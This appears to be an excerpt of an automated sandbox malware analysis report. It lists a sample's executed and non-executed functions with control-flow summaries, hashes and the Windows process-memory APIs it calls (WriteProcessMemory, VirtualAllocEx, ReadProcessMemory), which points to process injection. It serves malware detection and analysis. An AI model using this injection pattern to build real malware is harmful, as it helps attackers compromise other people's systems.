                                                                                                                                                  control_flow_graph 555 6d50538-6d50586 557 6d50596-6d505d5 WriteProcessMemory 555->557 558 6d50588-6d50594 555->558 560 6d505d7-6d505dd 557->560 561 6d505de-6d5060e 557->561 558->557 560->561
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D505C8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 3559483778-3816178591
                                                                                                                                                  • Opcode ID: e9a6f7365ccbd021a5bdce30c31a99b7d33d2aec9933e2b4fc2166e35afb259e
                                                                                                                                                  • Instruction ID: 8c4cd4a59d94651609d1d694c5216b61b39d8525092bf0fa1f812f5037fbb915
                                                                                                                                                  • Opcode Fuzzy Hash: e9a6f7365ccbd021a5bdce30c31a99b7d33d2aec9933e2b4fc2166e35afb259e
                                                                                                                                                  • Instruction Fuzzy Hash: CA2127B19003599FCF10DFA9C885BEEBBF5FF48314F10842AE959A7250C7789944CBA4
                                                                                                                                                  Function 06D50620 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 565 6d50620-6d506b5 ReadProcessMemory 569 6d506b7-6d506bd 565->569 570 6d506be-6d506ee 565->570 569->570
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D506A8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 1726664587-3816178591
                                                                                                                                                  • Opcode ID: e144683a6e1d09a63cf91fc9fdc6fac093ac060cd22384a5abe4894aa6d8236f
                                                                                                                                                  • Instruction ID: 7de1eb6d8bb53455960f369b88c60469db7a4d412c8aab444403c4b97c384c8a
                                                                                                                                                  • Opcode Fuzzy Hash: e144683a6e1d09a63cf91fc9fdc6fac093ac060cd22384a5abe4894aa6d8236f
                                                                                                                                                  • Instruction Fuzzy Hash: 492119B18003599FCB10DFA9C885AEEFBF5FF48310F14842AE959A7250C7789544CBA4
                                                                                                                                                  Function 06D50628 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 574 6d50628-6d506b5 ReadProcessMemory 577 6d506b7-6d506bd 574->577 578 6d506be-6d506ee 574->578 577->578
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D506A8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 1726664587-3816178591
                                                                                                                                                  • Opcode ID: 2d29ca243800d837ebbac19c3f56480c916f1266978b0833c54e375d077b50f7
                                                                                                                                                  • Instruction ID: 971abf1344be32ddcd307fcd1b9ab51b5a511e8436da0cd4aed66a41538878ad
                                                                                                                                                  • Opcode Fuzzy Hash: 2d29ca243800d837ebbac19c3f56480c916f1266978b0833c54e375d077b50f7
                                                                                                                                                  • Instruction Fuzzy Hash: 8D2128B18003599FCB10DFAAC884ADEFBF5FF88310F10842AE959A7250C7749544CBA4
                                                                                                                                                  Function 00E6DCA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 582 e6dca8-e6dd3c DuplicateHandle 583 e6dd45-e6dd62 582->583 584 e6dd3e-e6dd44 582->584 584->583
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6DD2F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 3793708945-3816178591
                                                                                                                                                  • Opcode ID: 26621591322b78fbe70a9822543488ba1fb3841b0397a001464e8a65ebdf42a0
                                                                                                                                                  • Instruction ID: eba0cf96f98a49dac042a2229583a31c9c4f317f3b57c12ac4b913ca1a5854a9
                                                                                                                                                  • Opcode Fuzzy Hash: 26621591322b78fbe70a9822543488ba1fb3841b0397a001464e8a65ebdf42a0
                                                                                                                                                  • Instruction Fuzzy Hash: 7321E4B5D002089FDB10CF9AD984ADEBFF4EB48310F14841AE918A7310D374A940CFA5
                                                                                                                                                  Function 06D50470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 587 6d50470-6d504f3 VirtualAllocEx 591 6d504f5-6d504fb 587->591 592 6d504fc-6d50521 587->592 591->592
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D504E6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 4275171209-3816178591
                                                                                                                                                  • Opcode ID: de3596a46175641fed875aa267bb202f07dcb8a0c3ff3d28cc944abc5e828d2c
                                                                                                                                                  • Instruction ID: 1d263ac2e7fe8ac1c90b85d393ed61b582ed1345b1aced20eb6b3c29717952b9
                                                                                                                                                  • Opcode Fuzzy Hash: de3596a46175641fed875aa267bb202f07dcb8a0c3ff3d28cc944abc5e828d2c
                                                                                                                                                  • Instruction Fuzzy Hash: 551156728002499FCB20DFAAC845BDFBFF5EF88320F148819E959A7250C775A544CFA0
                                                                                                                                                  Function 06D50478 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 596 6d50478-6d504f3 VirtualAllocEx 599 6d504f5-6d504fb 596->599 600 6d504fc-6d50521 596->600 599->600
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D504E6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 4275171209-3816178591
                                                                                                                                                  • Opcode ID: e70950112a5499745c721687d338d9f4196ad966912b3a680e74ae0d30056a89
                                                                                                                                                  • Instruction ID: 1ef6d9b3d310d99f1b091ae33802efa3e2d3e99db26cca76a06144bdf9bfa3fb
                                                                                                                                                  • Opcode Fuzzy Hash: e70950112a5499745c721687d338d9f4196ad966912b3a680e74ae0d30056a89
                                                                                                                                                  • Instruction Fuzzy Hash: 381137719002499FCF10DFAAC844BDEBFF5EF88324F148419E959A7250C775A544CFA5
                                                                                                                                                  Function 00E6B9B8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E6BA1E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 4139908857-3816178591
                                                                                                                                                  • Opcode ID: 0e2bb527a480d0c06e02a74c15984b6a57fc5f31abac783fb70b4c5ac7a22286
                                                                                                                                                  • Instruction ID: e5417a29328c33aeb7d364e1fdb569c42e9b51375853e1271883ae9ac7a90282
                                                                                                                                                  • Opcode Fuzzy Hash: 0e2bb527a480d0c06e02a74c15984b6a57fc5f31abac783fb70b4c5ac7a22286
                                                                                                                                                  • Instruction Fuzzy Hash: 2F11E0B5C006498FCB20CF9AD444ADEFBF4AB88324F14842AD469B7610C375A585CFA5
                                                                                                                                                  Function 06D52930 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 06D52995
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 410705778-3816178591
                                                                                                                                                  • Opcode ID: c0f4b4c72f1af698a8382570115bd1384c8e78e94ff9010d116eb428f0d29d78
                                                                                                                                                  • Instruction ID: 7674e549769f6bd41db69fd7b8dbef2c2089203dd231f5a0ec02499bb50f2119
                                                                                                                                                  • Opcode Fuzzy Hash: c0f4b4c72f1af698a8382570115bd1384c8e78e94ff9010d116eb428f0d29d78
                                                                                                                                                  • Instruction Fuzzy Hash: 1211F2B5800249DFCB10CF99C988BDFBBF8EB48324F10841AD459A7610C374A644CFA1
                                                                                                                                                  Function 06D52938 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 06D52995
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 410705778-3816178591
                                                                                                                                                  • Opcode ID: 4efbbaef4c073588388657f4a404bdf2aa84f88f42fc68d5b3adfa1f79e11fb3
                                                                                                                                                  • Instruction ID: cff19de0dc31a04773319fa4f5598a31153af14bba2e95630a341f69b1facbf1
                                                                                                                                                  • Opcode Fuzzy Hash: 4efbbaef4c073588388657f4a404bdf2aa84f88f42fc68d5b3adfa1f79e11fb3
                                                                                                                                                  • Instruction Fuzzy Hash: C511C2B58003499FDB10DF9AC885BDEBBF8EB58324F108419D959A7610C375A544CFA5
                                                                                                                                                  Function 00ADD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                                                                  • Instruction ID: bd0bfd9e69af8dc0d64559fef1a6d26193067be09089727c11ee44fab34e7cb0
                                                                                                                                                  • Opcode Fuzzy Hash: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                                                                  • Instruction Fuzzy Hash: B82103B1540240EFCB05DF14E9C0B26BF65FB98318F20C56AE80A0B356C336D856CBA1
                                                                                                                                                  Function 00ADD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                                                                  • Instruction ID: 0851b1e90506577a8ecd98cbc5f593e2824baa7059d449e8db092d49f8cbaa96
                                                                                                                                                  • Opcode Fuzzy Hash: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                                                                  • Instruction Fuzzy Hash: 672125B1500204EFDB05DF14D9C4B2ABF75FB98324F20C56AE90A4F356C336E856CAA2
                                                                                                                                                  Function 00AED01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 759419290c2ea82595577763c9807474a62826f344ae28f33bf73e0506dc25fd
                                                                                                                                                  • Instruction ID: 47947d66af06e3d4eabe9c17f48fedea2d06ca86ce88b78b2a7ca8c7e7256f07
                                                                                                                                                  • Opcode Fuzzy Hash: 759419290c2ea82595577763c9807474a62826f344ae28f33bf73e0506dc25fd
                                                                                                                                                  • Instruction Fuzzy Hash: 0B210171604280EFCB14DF25D9C4B26BFA5FB88314F28C56DE80A4B296C33BD847CA61
                                                                                                                                                  Function 00AED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4504f3633702e878678b6a582d974dbcf728af1f7879bf66e065490b6dfb894b
                                                                                                                                                  • Instruction ID: a2546cb2418c0041a42925baf21e05580c6cdd531666cd615654f05796de8db5
                                                                                                                                                  • Opcode Fuzzy Hash: 4504f3633702e878678b6a582d974dbcf728af1f7879bf66e065490b6dfb894b
                                                                                                                                                  • Instruction Fuzzy Hash: 04212675504280EFDB05DF15DAC0B66BBB5FB84314F20C66DEA094F296C336D846CA61
                                                                                                                                                  Function 00AED006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83cc771b1cef0d0fa63fb309ffd5cd421e6e4986815a9266cba00c1c6b08cbe7
                                                                                                                                                  • Instruction ID: b5f4f8692c31ad5df00f62d82b811c8de593d9f43f58ae05c7c5a059b81d0b2f
                                                                                                                                                  • Opcode Fuzzy Hash: 83cc771b1cef0d0fa63fb309ffd5cd421e6e4986815a9266cba00c1c6b08cbe7
                                                                                                                                                  • Instruction Fuzzy Hash: 1F215E755093C08FDB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                  Function 00ADD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction ID: 44c1b3bf650aa77bfe164641477418ad43885590b909cdbd78e65f436b67e611
                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction Fuzzy Hash: 1C11D376504280DFCB16CF14D5C4B16BF71FB94318F24C6AAD84A0B756C336D85ACBA1
                                                                                                                                                  Function 00ADD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction ID: aeaa552d8b3e9efcb0839fa664057d88822349d3a2b36e64df06b4a584ebf931
                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction Fuzzy Hash: 5111D3B6504240DFDB16CF14D5C4B16BF71FB94324F24C6AAD90A0B756C33AE85ACBA1
                                                                                                                                                  Function 00AED1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction ID: b37f2a4e91eb8446d658cab8ed70baaa572a06e4e7c21c14873391fbd094dd84
                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction Fuzzy Hash: B411BB75504280DFCB02CF10C5C4B55BBA1FB84314F24C6AAD9494B296C33AD80ACB61

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 06D50040 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bdacf605b576032cb23ea4db5ec65d1d84022c39416970dd89d69193fe252263
                                                                                                                                                  • Instruction ID: 7e10989025e8ae48663016b499202bd6f3747fb1c8d821a7b30ef66299ce7e15
                                                                                                                                                  • Opcode Fuzzy Hash: bdacf605b576032cb23ea4db5ec65d1d84022c39416970dd89d69193fe252263
                                                                                                                                                  • Instruction Fuzzy Hash: 4BE10974E041198FDB54DFA9C5809AEFBF2FF89304F248169E815AB356D730A941CFA1
                                                                                                                                                  Function 00E6E5A4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b2a3819a2249f987c0ca729a65943e7b8597dfc1682f6b9177cd370da638e71e
                                                                                                                                                  • Instruction ID: e44253b9dae2638a1790d465eeecbad8efaab423eb6e30b0c977fb3f19c0658c
                                                                                                                                                  • Opcode Fuzzy Hash: b2a3819a2249f987c0ca729a65943e7b8597dfc1682f6b9177cd370da638e71e
                                                                                                                                                  • Instruction Fuzzy Hash: E6A16B36E402098FCF05DFB4E8549AEB7F2FF84344B15956AE802BB265DB31E915CB80
                                                                                                                                                  Function 06D51851 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ca12d9c27d690fdeed738b8e3000e92fd9fdae63995a00774a1b02bcae24c7dd
                                                                                                                                                  • Instruction ID: ee6eaa49accdbf4f145e39e4269afae87c6316d5c6f0ed1960f024c6fed8b194
                                                                                                                                                  • Opcode Fuzzy Hash: ca12d9c27d690fdeed738b8e3000e92fd9fdae63995a00774a1b02bcae24c7dd
                                                                                                                                                  • Instruction Fuzzy Hash: DA31B4B1D056288BEF68CF6BCC047DAFAF6AFC9304F05D1AAC41CA6254DB740A858F51

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 01587118 Relevance: 5.4, Strings: 4, Instructions: 388COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                  • API String ID: 0-879173519
                                                                                                                                                  • Opcode ID: 58b2f703dc623b9477b5348e06c2a8b8e2c92552f98504b395ec7b80abf92f3a
                                                                                                                                                  • Instruction ID: b88cb23e8efea53d4cd65499dce35cad6bc276f4b1328715604685ccc94652d1
                                                                                                                                                  • Opcode Fuzzy Hash: 58b2f703dc623b9477b5348e06c2a8b8e2c92552f98504b395ec7b80abf92f3a
                                                                                                                                                  • Instruction Fuzzy Hash: B2F12B31A00215CFDB15EFA9C884AADBFF6BF89314F258465E945AB361DB30E841CB61
                                                                                                                                                  Function 015829EC Relevance: 5.3, Strings: 4, Instructions: 337COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                  • API String ID: 0-2732225958
                                                                                                                                                  • Opcode ID: 474b0ecf6c048e772b6affc7d20645ea16bd645cb724196126e95a53d1db4b16
                                                                                                                                                  • Instruction ID: a690200ecf388bf80644235010935f193a8d8c11dad072f448ea976e2d90dd2d
                                                                                                                                                  • Opcode Fuzzy Hash: 474b0ecf6c048e772b6affc7d20645ea16bd645cb724196126e95a53d1db4b16
                                                                                                                                                  • Instruction Fuzzy Hash: FBB11731D40359CFCBA19FA8D4942AEBBB1FF84324F20496AC045EB255DB74C986CB92
                                                                                                                                                  Function 0158A088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$4'^q
                                                                                                                                                  • API String ID: 0-273632683
                                                                                                                                                  • Opcode ID: 74657b0237b0c7cd00286b84e3998fc14bfd2250c78f02d8d4475185e33faac3
                                                                                                                                                  • Instruction ID: b186b8c706f4fadb2f99f1b595cbe687fc4dcc4c5b0b30d65b0bec67aeb9ca37
                                                                                                                                                  • Opcode Fuzzy Hash: 74657b0237b0c7cd00286b84e3998fc14bfd2250c78f02d8d4475185e33faac3
                                                                                                                                                  • Instruction Fuzzy Hash: 00827E35A00209DFCB16DFA8C584AAEBBF2FF88310F158956E545AF366D770E981CB50
                                                                                                                                                  Function 015869A0 Relevance: 3.0, Strings: 2, Instructions: 514COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$Hbq
                                                                                                                                                  • API String ID: 0-662517225
                                                                                                                                                  • Opcode ID: b54040a9211d9e2c34fdae8bff2acd3602970ac7c617d4cbe106efaa25718df9
                                                                                                                                                  • Instruction ID: 1ffefc159d1926dc6b9b57c6ad00ca8ac54a1d77eafe7fecfd09a770ef9c63a6
                                                                                                                                                  • Opcode Fuzzy Hash: b54040a9211d9e2c34fdae8bff2acd3602970ac7c617d4cbe106efaa25718df9
